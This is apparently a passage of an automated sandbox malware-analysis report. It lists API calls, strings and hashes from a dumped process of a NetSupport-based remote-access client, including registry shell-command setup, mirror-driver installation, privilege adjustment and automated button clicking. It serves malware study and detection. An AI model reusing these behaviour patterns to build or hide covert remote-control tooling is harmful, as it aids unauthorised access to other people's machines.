                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                        • API String ID: 3698121176-3819984048
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$EnvironmentExpandStrings__wcsicoll__wcsnicmp_wcschr
                                                                                                                        • String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
                                                                                                                        • API String ID: 2277666257-3241390832
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • LoadStringW.USER32(00AE0000,00000421,?,00000080), ref: 00B25258
                                                                                                                        • wsprintfW.USER32 ref: 00B2528C
                                                                                                                        • wsprintfW.USER32 ref: 00B252A9
                                                                                                                        • wsprintfW.USER32 ref: 00B252DC
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000000,?,?), ref: 00B25308
                                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 00B25348
                                                                                                                        • RegCreateKeyW.ADVAPI32(?,command,?), ref: 00B2537F
                                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 00B253BA
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B253D8
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B253E5
                                                                                                                        • wsprintfW.USER32 ref: 00B25400
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 00B25417
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 00B2543A
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CloseCreateDeleteValue$LoadLocalStringTime_mallocwvsprintf
                                                                                                                        • String ID: "%spcinssui.exe" /ShowVideo "%%L"$%s=%s, err=%d$%s\command$%s\shell\show$Del %s, err=%d$Done InstallShowVideo.$InstallShowVideo %d$command$command=%s, err=%d
                                                                                                                        • API String ID: 217169776-1530699150
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000080), ref: 00B0E0D7
                                                                                                                        • _memset.LIBCMT ref: 00B0E16E
                                                                                                                        • _memset.LIBCMT ref: 00B0E1C3
                                                                                                                        • _memset.LIBCMT ref: 00B0E214
                                                                                                                        • EnumChildWindows.USER32(?,Function_0002DF40,?), ref: 00B0E229
                                                                                                                        • GetClassNameW.USER32(?,?,00000040), ref: 00B0E33B
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B0E3D6
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B0E44A
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B0E45D
                                                                                                                        • LoadLibraryW.KERNEL32(psapi.dll), ref: 00B0E472
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00B0E4B1
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0E4D5
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B0E4DC
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B0E4ED
                                                                                                                        • PostMessageW.USER32(?,00000200,00000000,00050005), ref: 00B0E505
                                                                                                                        • PostMessageW.USER32(?,00000201,00000000,00050005), ref: 00B0E513
                                                                                                                        • PostMessageW.USER32(?,00000202,00000000,00050005), ref: 00B0E521
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost_memset$ClassLibraryNameProcessWindow$AddressChildCloseEnumErrorFreeHandleLastLoadOpenProcRectThreadWindows
                                                                                                                        • String ID: #32770$Button$GetModuleFileNameExW$psapi.dll
                                                                                                                        • API String ID: 3432119596-2766096174
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B31540: LookupAccountNameW.ADVAPI32(00000000,?,00B3252C,?,?,?,?), ref: 00B3158E
                                                                                                                          • Part of subcall function 00B31540: GetLastError.KERNEL32 ref: 00B31598
                                                                                                                        • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B32247
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B322B7
                                                                                                                        • GetLastError.KERNEL32 ref: 00B322C1
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B322E4
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B322F6
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B3230A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B32311
                                                                                                                        • InitializeAcl.ADVAPI32(00000000,?,00000002), ref: 00B3231D
                                                                                                                        • GetLastError.KERNEL32 ref: 00B32327
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B32369
                                                                                                                        • AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 00B32393
                                                                                                                        • AddAuditAccessAce.ADVAPI32(00000000,00000002,?,?,?,?), ref: 00B323B8
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,00000002,000000FF,00000000,?), ref: 00B323C2
                                                                                                                          • Part of subcall function 00B3A205: _malloc.LIBCMT ref: 00B3A213
                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000001), ref: 00B32435
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 00B32442
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B32449
                                                                                                                          • Part of subcall function 00B315D0: GetCurrentProcess.KERNEL32(00000028,?), ref: 00B31600
                                                                                                                          • Part of subcall function 00B315D0: OpenProcessToken.ADVAPI32(00000000), ref: 00B31607
                                                                                                                          • Part of subcall function 00B315D0: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00B3161B
                                                                                                                          • Part of subcall function 00B315D0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00B31647
                                                                                                                          • Part of subcall function 00B315D0: GetLastError.KERNEL32 ref: 00B31651
                                                                                                                          • Part of subcall function 00B315D0: CloseHandle.KERNEL32(?), ref: 00B3165D
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$HeapProcess$FreeLengthLookupToken$AccessAccountAddressAdjustAllocAuditCloseCurrentHandleInformationInitializeLocalNameOpenPrivilegePrivilegesProcValue_malloc
                                                                                                                        • String ID: GetNamedSecurityInfoW$SetNamedSecurityInfoW$W
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(setupapi,00B2CD69), ref: 00AFEDF5
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiDestroyDeviceInfoList), ref: 00AFEE22
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceRegistryPropertyW), ref: 00AFEE34
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInfo), ref: 00AFEE47
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsW), ref: 00AFEE5A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiDeleteDeviceInfo), ref: 00AFEE6C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiCallClassInstaller), ref: 00AFEE7F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiSetDeviceRegistryPropertyW), ref: 00AFEE92
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiCreateDeviceInfoW), ref: 00AFEEA4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiCreateDeviceInfoList), ref: 00AFEEB7
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        Strings
                                                                                                                        • SetupDiCreateDeviceInfoW, xrefs: 00AFEE9E
                                                                                                                        • SetupDiEnumDeviceInfo, xrefs: 00AFEE3C
                                                                                                                        • SetupDiGetDeviceRegistryPropertyW, xrefs: 00AFEE2E
                                                                                                                        • SetupDiCallClassInstaller, xrefs: 00AFEE74
                                                                                                                        • SetupDiGetClassDevsW, xrefs: 00AFEE4F
                                                                                                                        • SetupDiCreateDeviceInfoList, xrefs: 00AFEEAC
                                                                                                                        • SetupDiDeleteDeviceInfo, xrefs: 00AFEE66
                                                                                                                        • SetupDiSetDeviceRegistryPropertyW, xrefs: 00AFEE87
                                                                                                                        • setupapi, xrefs: 00AFEDF0
                                                                                                                        • SetupDiDestroyDeviceInfoList, xrefs: 00AFEE1C
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Load$LibraryStringwvsprintf
                                                                                                                        • String ID: SetupDiCallClassInstaller$SetupDiCreateDeviceInfoList$SetupDiCreateDeviceInfoW$SetupDiDeleteDeviceInfo$SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceRegistryPropertyW$SetupDiSetDeviceRegistryPropertyW$setupapi
                                                                                                                        APIs
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B082EE
                                                                                                                          • Part of subcall function 00B06BB0: GetDC.USER32(00000000), ref: 00B06BB7
                                                                                                                        • GetSysColor.USER32(00000010), ref: 00B0831C
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B0835D
                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00B0836D
                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00B08376
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08431
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B0843A
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08440
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B08446
                                                                                                                          • Part of subcall function 00B12410: GetObjectW.GDI32(?,00000018,?), ref: 00B12423
                                                                                                                          • Part of subcall function 00B12410: CreateCompatibleDC.GDI32(00000000), ref: 00B12431
                                                                                                                          • Part of subcall function 00B12410: CreateCompatibleDC.GDI32(00000000), ref: 00B12436
                                                                                                                          • Part of subcall function 00B12410: SelectObject.GDI32(00000000,00000000), ref: 00B1244E
                                                                                                                          • Part of subcall function 00B12410: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00B12461
                                                                                                                          • Part of subcall function 00B12410: SelectObject.GDI32(00000000,00000000), ref: 00B1246C
                                                                                                                          • Part of subcall function 00B12410: SetBkColor.GDI32(00000000,00000000), ref: 00B12476
                                                                                                                          • Part of subcall function 00B12410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00B12493
                                                                                                                          • Part of subcall function 00B12410: SetBkColor.GDI32(00000000,00000000), ref: 00B1249C
                                                                                                                          • Part of subcall function 00B12410: SetTextColor.GDI32(00000000,00FFFFFF), ref: 00B124A8
                                                                                                                          • Part of subcall function 00B12410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 00B124C5
                                                                                                                          • Part of subcall function 00B12410: SetBkColor.GDI32(00000000,00B0700B), ref: 00B124D0
                                                                                                                          • Part of subcall function 00B12410: SetTextColor.GDI32(00000000,00000000), ref: 00B124D9
                                                                                                                          • Part of subcall function 00B12410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 00B124F6
                                                                                                                          • Part of subcall function 00B12410: SelectObject.GDI32(00000000,00000000), ref: 00B12501
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B08467
                                                                                                                        • _memmove.LIBCMT ref: 00B084AB
                                                                                                                        • _memset.LIBCMT ref: 00B084B5
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$ColorGlobal$CreateSelect$CompatibleDeleteFreeLockTextUnlock$Bitmap_memmove_memset
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B39583: __wfsopen.LIBCMT ref: 00B39590
                                                                                                                        • wsprintfW.USER32 ref: 00B0EA34
                                                                                                                        • _wcschr.LIBCMT ref: 00B0EAC1
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B0E941
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CurrentDirectoryLocalTime__wfsopen_malloc_wcschrwvsprintf
                                                                                                                        • String ID: %s\%s$Update [%s]%s=%s, format=%d$can't open client32.upd$client32.ini$client32.ini %s$client32.upd$client32u.ini$client32u.ini %s$doesn't exist$error %d opening %s - update failed$exists$update error$update error - wrong file format?$updating from client32.upd, cwd=%s
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B06BB0: GetDC.USER32(00000000), ref: 00B06BB7
                                                                                                                          • Part of subcall function 00B060C0: GetObjectW.GDI32(?,00000018,?), ref: 00B060DE
                                                                                                                          • Part of subcall function 00B060C0: GetStockObject.GDI32(0000000F), ref: 00B060F2
                                                                                                                          • Part of subcall function 00B060C0: GetDC.USER32(00000000), ref: 00B06174
                                                                                                                          • Part of subcall function 00B060C0: SelectPalette.GDI32(00000000,?,00000000), ref: 00B06185
                                                                                                                          • Part of subcall function 00B060C0: RealizePalette.GDI32(00000000), ref: 00B0618B
                                                                                                                          • Part of subcall function 00B060C0: GlobalAlloc.KERNEL32(00000042,?), ref: 00B061A6
                                                                                                                          • Part of subcall function 00B060C0: SelectPalette.GDI32(00000000,?,00000001), ref: 00B061BA
                                                                                                                          • Part of subcall function 00B060C0: RealizePalette.GDI32(00000000), ref: 00B061BD
                                                                                                                          • Part of subcall function 00B060C0: ReleaseDC.USER32(00000000,00000000), ref: 00B061C5
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B08CC7
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B08CF3
                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00B08D0B
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B08D11
                                                                                                                        • _memmove.LIBCMT ref: 00B08DD2
                                                                                                                        • _memmove.LIBCMT ref: 00B08ED0
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B08EF0
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B08EF7
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08F05
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B08F0C
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B08F17
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B08F2E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B08F37
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08F3D
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B08F43
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B08F63
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B08F7D
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B08F80
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08F8E
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B08F91
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B08F9C
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Object$FreeUnlock$Palette$Delete$LockRealizeSelect_memmove$AllocReleaseStock
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(netapi32.dll), ref: 00B1CA05
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 00B1CA36
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 00B1CA44
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 00B1CA52
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00B1CAA3
                                                                                                                        • GetTickCount.KERNEL32 ref: 00B1CB10
                                                                                                                        • GetTickCount.KERNEL32 ref: 00B1CB33
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                                                        • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00AEADB9
                                                                                                                          • Part of subcall function 00AE9BE0: wvsprintfW.USER32(?,?,?), ref: 00AE9C0B
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00AEAE57
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00AEAE71
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00AEAE8B
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp$ErrorLastwvsprintf
                                                                                                                        • String ID: DeviceID %d=%s$HDAUDIO\$OK.$PCI\$SetupDiCallClassInstaller failed, e=x%x$SetupDiCallClassInstaller...$SetupDiEnumDeviceInfo failed, e=x%x$SetupDiGetClassDevs failed, e=x%x$SetupDiSetClassInstallParams failed, e=x%x$USB\
                                                                                                                        APIs
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B12423
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B12431
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B12436
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B1244E
                                                                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00B12461
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B1246C
                                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00B12476
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00B12493
                                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00B1249C
                                                                                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00B124A8
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 00B124C5
                                                                                                                        • SetBkColor.GDI32(00000000,00B0700B), ref: 00B124D0
                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 00B124D9
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 00B124F6
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B12501
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B12508
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B12511
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B12514
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B12520
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B12526
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Color$DeleteSelect$Create$CompatibleText$Bitmap
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF0CD
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF145
                                                                                                                        • GetTempFileNameW.KERNEL32(?,00B6D714,00000000,?), ref: 00AFF158
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00AFF16E
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000005), ref: 00AFF1A3
                                                                                                                        Strings
                                                                                                                        • gdihook5.inf, xrefs: 00AFF052
                                                                                                                        • Unloadable mirror detected - update on reboot, xrefs: 00AFF12C
                                                                                                                        • gdihook5 (e2=%d), xrefs: 00AFF430
                                                                                                                        • Try again after removing the 'Block Unsigned Driver Policy', xrefs: 00AFF472
                                                                                                                        • \gdihook5.dll, xrefs: 00AFF0F1
                                                                                                                        • mirror already installed, xrefs: 00AFF105
                                                                                                                        • InstallGdihook5 ret %d, xrefs: 00AFF496
                                                                                                                        • rename %s to %s on reboot ok, xrefs: 00AFF1BB
                                                                                                                        • gdihook5.dll, xrefs: 00AFF0B8
                                                                                                                        • copy %s to %s ok, xrefs: 00AFF186
                                                                                                                        • using .inf=%s, xrefs: 00AFF060
                                                                                                                        Similarity
                                                                                                                        • API ID: File$DirectorySystem$CopyMoveNameTemp
                                                                                                                        • String ID: Try again after removing the 'Block Unsigned Driver Policy'$InstallGdihook5 ret %d$Unloadable mirror detected - update on reboot$\gdihook5.dll$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$gdihook5.inf$mirror already installed$rename %s to %s on reboot ok$using .inf=%s
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,5E06C67B), ref: 00AE541B
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B6A054,00000000,?,00000000,?,?), ref: 00AE550C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AE554D
                                                                                                                        • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 00AE555E
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00AE556B
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AE5580
                                                                                                                        • RegSetValueExW.ADVAPI32(?,nssCurrConfig,00000000,00000001,?,?), ref: 00AE563A
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCriticalSection$CreateDeleteEnterLeaveValue
                                                                                                                        • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp$CurrConfig$MiniDumpType$_debug$err == 0$nssCurrConfig$traceConfig
                                                                                                                        APIs
                                                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,00000000,00AE3AE9,?,?,00000000), ref: 00AFC858
                                                                                                                        • GetLastError.KERNEL32 ref: 00AFC86B
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00AFC86E
                                                                                                                        • wsprintfW.USER32 ref: 00AFC884
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileMappingOpenwsprintf
                                                                                                                        • String ID: can't open filemap(%s), gle=%d (x%x)$cant map$openevent error$ver dead$ver unknown$zero pid
                                                                                                                        • API String ID: 3808650745-1998751255
                                                                                                                        • Opcode ID: 9250fd4c8841e791cd933f43ffff432e8d5878a8985223be99e7ea5d3fe4fbd4
                                                                                                                        • Instruction ID: 0d9dddcb13c536b40486630b505d7b567a3f0c6f6c9add033213cee9f198657d
                                                                                                                        • Opcode Fuzzy Hash: 9250fd4c8841e791cd933f43ffff432e8d5878a8985223be99e7ea5d3fe4fbd4
                                                                                                                        • Instruction Fuzzy Hash: F761D971B4070C9AD725EFA5DD05FBA73E8EB94710F00419EFA06972C1EEB0AA04CB94
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B1CE67
                                                                                                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00B1CE84
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00B1CEA5
                                                                                                                        • GetDC.USER32(00000000), ref: 00B1CF5A
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B1CF64
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B1CF6E
                                                                                                                        • GetTextExtentPoint32W.GDI32(00000000,00B71584,00000001,?), ref: 00B1CF89
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1CF97
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B1CF9E
                                                                                                                        • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00B1CFD0
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B1CFDC
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B1CFE5
                                                                                                                        • GetMenuInfo.USER32(?,?), ref: 00B1D074
                                                                                                                        • SetMenuInfo.USER32(?,0000001C), ref: 00B1D090
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInfoObject$DeleteMenuSelect$CompatibleExtentFontIndirectParametersPoint32ReleaseSectionSystemText_memset
                                                                                                                        • String ID: ($IncreaseMenuItemHeight
                                                                                                                        • API String ID: 2580152395-1213050523
                                                                                                                        • Opcode ID: 1f4b9ab4fc44c33a839769f5e0a94e779e41d0a8fe8bb11eb59626bf78ac6b4d
                                                                                                                        • Instruction ID: 3c243330fbb051e3142ed9b1eb0ae00b3562e8957d7a65de6b5e074589e4b7b5
                                                                                                                        • Opcode Fuzzy Hash: 1f4b9ab4fc44c33a839769f5e0a94e779e41d0a8fe8bb11eb59626bf78ac6b4d
                                                                                                                        • Instruction Fuzzy Hash: C76119B09012289FDB60CF68DD89BD9BBF9EB48304F4041E9E60DE7250EB754A85CF65
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B1024B
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B044E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,5E06C67B,00000000,00000000), ref: 00B0452B
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00B1048C
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B1054A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumOpen__wcsicoll__wcsnicmpwsprintf
                                                                                                                        • String ID: %s\%s$ConfigList$Files\AppData$Files\CommonAppData$Files\LocalAppData$Files\Shared$General\ProductId$IsA()$Set HKLM\...%s\Files\Shared=1$Software\Productive Computer Insight$chg HKLM %s to %s from %s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 89132307-710025092
                                                                                                                        • Opcode ID: c02917fdc76c745b5431e7389ff6bf8087ae236d62a9c1a2e49a511e57df37b0
                                                                                                                        • Instruction ID: 3431c34aaeed785f26cba4ecba12b5cb777a2852f7b46990a7840a6806c539e5
                                                                                                                        • Opcode Fuzzy Hash: c02917fdc76c745b5431e7389ff6bf8087ae236d62a9c1a2e49a511e57df37b0
                                                                                                                        • Instruction Fuzzy Hash: 6CE18C719106199FDB20EB54DC92BEEB7F6EFA4304F0041E8E50963291DFB26E98CE50
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,5E06C67B), ref: 00AE7099
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,5E06C67B), ref: 00AE71D6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
